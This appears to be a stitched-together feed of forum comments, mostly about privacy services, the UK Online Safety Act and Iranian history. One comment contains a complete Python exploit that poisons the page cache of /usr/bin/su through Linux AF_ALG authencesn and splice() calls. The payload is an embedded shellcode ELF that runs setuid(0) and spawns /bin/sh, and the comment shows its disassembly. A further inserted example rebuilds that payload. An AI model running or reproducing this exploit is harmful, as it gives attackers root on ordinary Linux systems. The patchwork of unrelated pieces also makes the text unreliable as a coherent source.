

I use DragonFly BSD btw


Script:
#!/usr/bin/env python3
import os, socket

# Target opened read-only; it is only ever read through splice().
f = os.open("/usr/bin/su", 0)
# Minimal static x86-64 ELF (160 bytes): setuid(0); execve("/bin/sh", NULL, NULL); exit(0)
e = b'\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00>\x00\x01\x00\x00\x00x\x00@\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x008\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x00\x00\x9e\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x001\xc01\xff\xb0i\x0f\x05H\x8d=\x0f\x00\x00\x001\xf6j;X\x99\x0f\x051\xffj<X\x0f\x05/bin/sh\x00\x00\x00'

# One AEAD request per 4-byte chunk of the blob.
for i in range(0, len(e), 4):
    s = socket.socket(38, 5, 0)                      # AF_ALG, SOCK_SEQPACKET
    s.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    # SOL_ALG=279, ALG_SET_KEY=1: authenc rtattr (enckeylen 16) + 32 zero key bytes
    s.setsockopt(279, 1, bytes.fromhex('0800010000000010' + '0' * 64))
    s.setsockopt(279, 5, None, 4)                    # ALG_SET_AEAD_AUTHSIZE = 4
    u, _ = s.accept()
    u.sendmsg([b"AAAA" + e[i:i + 4]],
              [(279, 3, b'\x00\x00\x00\x00'),        # ALG_SET_OP: decrypt
               (279, 2, b'\x10' + b'\x00' * 19),     # ALG_SET_IV: ivlen 16, zero IV
               (279, 4, b'\x08\x00\x00\x00'), ],     # ALG_SET_AEAD_ASSOCLEN = 8
              32768)                                 # MSG_MORE
    # Feed the first i+4 bytes of su into the request via a pipe, from file offset 0.
    r, w = os.pipe()
    os.splice(f, w, i + 4, offset_src=0)
    os.splice(r, u.fileno(), i + 4)
    try:
        u.recv(8 + i)
    except OSError:
        pass                                         # auth failure is expected

os.system("su")
Blob:
0x00400078 eax = 0
0x0040007a edi = 0
0x0040007c al = 0x69 ; 'i' ; 105
0x0040007e syscall ; sys_setuid(0)
0x00400080 rdi = rip + 0xf ; data.00400096
; 0x400096 ; "/bin/sh"
0x00400087 esi = 0
0x00400089 push 0x3b ; ';' ; 59
0x0040008b pop rax
0x0040008c cdq
0x0040008d syscall ; sys_execve("/bin/sh", NULL, NULL)
0x0040008f edi = 0
0x00400091 push 0x3c ; '<' ; 60
0x00400093 pop rax
0x00400094 syscall ; sys_exit(0)
The blob is obviously a stub su that the /usr/bin/su page cache is poisoned with.
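As an added example (not the poster's code), here is how the 160-byte blob is put together and how to check it: a builder that wraps the post's shellcode in a minimal static ELF64 with a single R+X PT_LOAD segment mapped at 0x400000, and a parser that reads the header back, locates the entry point and resolves the RIP-relative lea to the "/bin/sh" string. The shellcode bytes are copied from the disassembly above; the builder, the 4-byte padding (so the exploit loop gets whole chunks), the field names and the check functions are this example's own assumptions.

```python
import struct

# Shellcode bytes exactly as disassembled in the post:
# setuid(0); execve("/bin/sh", NULL, NULL); exit(0), followed by the string
# that `lea rdi, [rip+0xf]` points at.
SHELLCODE = (
    b"\x31\xc0"                       # xor eax, eax
    b"\x31\xff"                       # xor edi, edi
    b"\xb0\x69"                       # mov al, 0x69        ; SYS_setuid
    b"\x0f\x05"                       # syscall             ; setuid(0)
    b"\x48\x8d\x3d\x0f\x00\x00\x00"   # lea rdi, [rip+0xf]  ; -> "/bin/sh"
    b"\x31\xf6"                       # xor esi, esi
    b"\x6a\x3b"                       # push 0x3b           ; SYS_execve
    b"\x58"                           # pop rax
    b"\x99"                           # cdq                 ; rdx = 0
    b"\x0f\x05"                       # syscall             ; execve
    b"\x31\xff"                       # xor edi, edi
    b"\x6a\x3c"                       # push 0x3c           ; SYS_exit
    b"\x58"                           # pop rax
    b"\x0f\x05"                       # syscall             ; exit(0)
    b"/bin/sh\x00"
)

# Elf64_Ehdr and Elf64_Phdr, little-endian (layout from the ELF spec).
EHDR_FMT = "<16sHHIQQQIHHHHHH"   # 64 bytes
PHDR_FMT = "<IIQQQQQQ"           # 56 bytes
ET_EXEC, EM_X86_64, PT_LOAD = 2, 0x3E, 1
PF_X, PF_R = 1, 4


def build_minimal_elf(code: bytes, base: int = 0x400000, pad_to: int = 4) -> bytes:
    """Header + one PT_LOAD phdr + code, no section table; entry right after the headers.
    pad_to is an assumption of this example: the exploit loop sends 4-byte chunks."""
    ehsize = struct.calcsize(EHDR_FMT)   # 0x40
    phsize = struct.calcsize(PHDR_FMT)   # 0x38
    entry = base + ehsize + phsize       # 0x400078 for the default base
    filesz = ehsize + phsize + len(code)
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS64, LSB, v1, SYSV
    ehdr = struct.pack(EHDR_FMT, ident, ET_EXEC, EM_X86_64, 1, entry,
                       ehsize, 0, 0, ehsize, phsize, 1, 0, 0, 0)
    # Segment maps the whole file (offset 0) at `base`, readable + executable.
    phdr = struct.pack(PHDR_FMT, PT_LOAD, PF_R | PF_X, 0, base, base,
                       filesz, filesz, 0x1000)
    blob = ehdr + phdr + code
    return blob + b"\x00" * (-len(blob) % pad_to)


def parse_minimal_elf(blob: bytes) -> dict:
    """Read the header and the first program header back out of a blob."""
    fields = struct.unpack_from(EHDR_FMT, blob, 0)
    ident, e_type, e_machine, _, e_entry, e_phoff = fields[:6]
    e_phnum = fields[10]
    if ident[:4] != b"\x7fELF" or ident[4] != 2:
        raise ValueError("not an ELF64 image")
    p_type, p_flags, p_offset, p_vaddr, _, p_filesz, p_memsz, _ = \
        struct.unpack_from(PHDR_FMT, blob, e_phoff)
    if p_type != PT_LOAD:
        raise ValueError("first program header is not PT_LOAD")
    code_off = e_entry - p_vaddr + p_offset      # file offset of the entry point
    return {
        "type": e_type, "machine": e_machine, "entry": e_entry, "phnum": e_phnum,
        "load_vaddr": p_vaddr, "load_flags": p_flags,
        "filesz": p_filesz, "memsz": p_memsz,
        "code": blob[code_off:p_filesz],
    }


def lea_target(blob: bytes) -> int:
    """Resolve the `lea rdi, [rip+disp32]` at entry+8: target = next RIP + disp."""
    info = parse_minimal_elf(blob)
    code = info["code"]
    if code[8:11] != b"\x48\x8d\x3d":
        raise ValueError("expected lea rdi,[rip+disp32] at entry+8")
    disp = struct.unpack_from("<i", code, 11)[0]
    return info["entry"] + 8 + 7 + disp           # instruction is 7 bytes long


def string_at(blob: bytes, vaddr: int) -> bytes:
    """NUL-terminated string at a virtual address inside the single segment."""
    info = parse_minimal_elf(blob)
    off = vaddr - info["load_vaddr"]
    return blob[off:blob.index(b"\x00", off)]


if __name__ == "__main__":
    blob = build_minimal_elf(SHELLCODE)
    info = parse_minimal_elf(blob)
    print(f"{len(blob)} bytes, entry 0x{info['entry']:x}, filesz 0x{info['filesz']:x}")
    print("lea target:", hex(lea_target(blob)), string_at(blob, lea_target(blob)))
```

The builder reproduces the post's layout: 64-byte header, 56-byte program header, code at file offset 0x78 (entry 0x400078), p_filesz 0x9e, two bytes of padding to reach 160. The same parser can be pointed at any ELF you suspect was stamped with a stub like this; a real /usr/bin/su has many program headers and a section table, so e_phnum == 1 and e_shoff == 0 on a setuid binary is itself a red flag.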


That’s what being in a fucking pickle means.
I mean, I’d do the same…


Namely,
Having a European version of the Play Integrity which permits people to use insecure products from specific European companies participating in it while disallowing using arbitrary hardware or software is the opposite of a solution. It’s more of the same anti-competitive garbage.
Hate to say it but he’s probably right.
I have no idea if it’s better or how to make that call.
Njalla (wiki) has an excellent privacy-activist pedigree; the crew is more left than simply freeze peach; and they have a record of competence.
I think they deserve to be better known, and should be considered alongside Mullvad.
Edit:
Port forwarding :)
Lemme just drop this here:


Confused Windows Millennium Edition noises


For what it’s worth, Libera IRC network published the legal advice that they got. According to that, Lemmy.zip is probably not in scope since it is just too small, thus doesn’t attract too many UK users inherently, and the UK is not a “target market”. They think that doing essentially nothing is a valid response in this case.
Of course, putting a block is also a valid response, and a louder one in some ways.


Please Don’t Be a Lurker!
Made an acc recently because most other instances are too eager to defederate. Lovely place!
Question: since you are incorporated in Wales, what do you expect to do with the OSA (nevermind its extraterritoriality)? Wait for Ofcom to notice?
Another: why is Piefed using 4x less memory than Lemmy? Number of users?


So… the consequences of the CIA’s actions?
That’s really fucking lazy. Also the consequences of British adventures in the century right up to that point, of Mongols torching everything to the ground, and oh Xerxes should have punished Dardanelles harder.
Like, yes it’s bad to rape people’s dignity, but come on, at least glance at Wikipedia sideways.
Khamenei was very involved in that.
You’ll shit bricks when you realise Khomeini and Khamenei are not the same Ayatollah :D


You confused the Islamic Republic with the Mohammad Reza Pahlavi era.
CIA installed the son of the previous usurper. Theocracy was not installed - it was a revolution against that.
Classic rookie mistake.
Sir Arthur “Bomber” Harris